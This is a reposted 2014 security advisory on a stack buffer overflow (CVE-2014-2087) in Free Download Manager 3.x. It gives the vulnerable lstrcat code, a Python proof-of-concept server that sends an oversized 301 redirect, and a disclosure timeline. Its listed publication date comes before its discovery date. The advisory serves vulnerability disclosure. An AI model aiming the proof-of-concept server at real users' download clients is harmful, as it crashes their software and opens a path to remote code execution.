首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Free Download Manager 3.x Buffer Overflow Vulnerability
来源:vfocus.net 作者:Ahrens 发布时间:2014-03-17  
1. ADVISORY INFORMATION
-----------------------
Product:        Free Download Manager
Vendor URL:     www.freedownloadmanager.org
Type:           Stack-based Buffer Overflow [CWE-121]
Date found:     2014-02-20
Date published: 2014-02-13
CVSSv2 Score:   9,3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
CVE:            CVE-2014-2087
   
   
2. CREDITS
----------
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
   
   
3. VERSIONS AFFECTED
--------------------
Free Download Manager v3.9.3 build 1360 (latest)
Free Download Manager v3.8 build 1173
Free Download Manager v3.0 build 852
and other older versions may be affected too.
   
   
4. VULNERABILITY DESCRIPTION
----------------------------
A stack-based buffer overflow vulnerability has been identified in the
Free Download Manager.
   
The application parses download requests, which are added to the
download queue, but does not properly validate the length of the
complete download queue object when it’s removed from the queue by the
user. The following function from fdm.exe (source file:
Downloads_Deleted.cpp) is triggered on deletion:
   
void CDownloads_Deleted::UpdateDownload(int iItem)
   
This function reads the filename of the download object using
CDownloads_Tasks::GetFileName into szFile and adds the whole URL value
as a description (in brackets) via an insecure strcat() sequence to
szFile during the queue deletion process.
  
Since the application follows HTTP 301 redirects, an attacker who
controls the target HTTP server is able to send arbitrary long filename
values to exploit this flaw. If the complete name of the queued download
exceeds the size of szFile (10000 bytes), strcat() writes outside the
expected memory boundaries. 
   
This leads to a stack-based buffer overflow with an overwritten SEH
chain or return points, resulting in remote code execution. Successful
exploits can allow remote attackers to execute arbitrary code with the
privileges of the user running the application. Failed exploits will
result in a denial-of-service condition.
   
This vulnerability is also exploitable locally via "File->Import->Import
list of downloads"
   
   
5. VULNERABLE CODE PART
-----------------------
// Downloads_Deleted.cpp
   
void CDownloads_Deleted::UpdateDownload(int iItem)
{
    vmsDownloadSmartPtr dld = (fsDownload*)GetItemData (iItem);
   
    CHAR szFile [10000];     
    CDownloads_Tasks::GetFileName (dld, szFile);
    lstrcat (szFile, " (");
    lstrcat (szFile, dld->pMgr->get_URL ());
    lstrcat (szFile, ")");
    SetItemText (iItem, 0, szFile);
[..]
}
  
  
6. PROOF-OF-CONCEPT (PYTHON)
----------------------------
#!/usr/bin/python
from socket import *
from time import sleep
   
host = "192.168.0.1"
port = 80
   
s = socket(AF_INET, SOCK_STREAM)
s.bind((host, port))
s.listen(1)
print "\n[+] Listening on %d ..." % port
   
cl, addr = s.accept()
print "[+] Connection accepted from %s" % addr[0]
   
junk0 = "\x43" * 9000
   
payload = junk0
   
buffer = "HTTP/1.1 301 Moved Permanently\r\n"
buffer += "Date: Thu, 20 Feb 2014 11:31:08 GMT\r\n"
buffer += "Server: Apache/2.2.22 (Debian)\r\n"
buffer += "Location: "+ payload + "\r\n"
buffer += "Vary: Accept-Encoding\r\n"
buffer += "Content-Length: 8000\r\n"
buffer += "Keep-Alive: timeout=5, max=100\r\n"
buffer += "Connection: Keep-Alive\r\n"
buffer += "Content-Type: text/html; charset=iso-8859-1\r\n"
buffer += "\r\n"
buffer += "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n"
buffer += "<html><head>\n"
buffer += "<title>301 Moved Permanently</title>\n"
buffer += "</head><body>\n"
buffer += "<h1>Moved Permanently</h1>\n"
buffer += "<p>The document has moved <a
href=\""+payload+"\">here</a>.</p>\n"
buffer += "</body></html>\n"
   
print cl.recv(1000)
cl.send(buffer)
print "[+] Sending buffer: OK\n"
   
sleep(1)
cl.close()
s.close()
   
   
7. SOLUTION
-----------
None
   
   
8. REPORT TIMELINE
------------------
2014-02-20: Discovery of the vulnerability
2014-02-21: Vendor Notification #1 with preset disclosure date (2014-03-09)
2014-02-24: MITRE assigns CVE-2014-2087
2014-02-25: Vendor Notification #2
2014-02-26: Vendor Notification #3
2014-03-05: Vendor Response
2014-03-05: Vulnerability details sent to vendor
2014-03-09: RCE Security asks for a status update
2014-03-13: No response from vendor
2014-03-13: Full Disclosure according to disclosure policy

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MicroP 0.1.1.1600 - (.mppl) Lo
·OS X / Safari / Firefox REGEX
·Firefox Exec Shellcode From Pr
·iOS 7 Arbitrary Code Execution
·Zoo 2.10 - Parse.c Local Buffe
·Trixbox Pro Remote Command Exe
·Ruby Gem Arabic Prawn 0.0.1 Co
·Gold MP4 Player 3.3 - Universa
·HP-UX rlpdaemon local exploit
·Oracle VirtualBox 3D Accelerat
·Array Networks vxAG / xAPV Pri
·Yokogawa CENTUM CS 3000 BKBCop
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved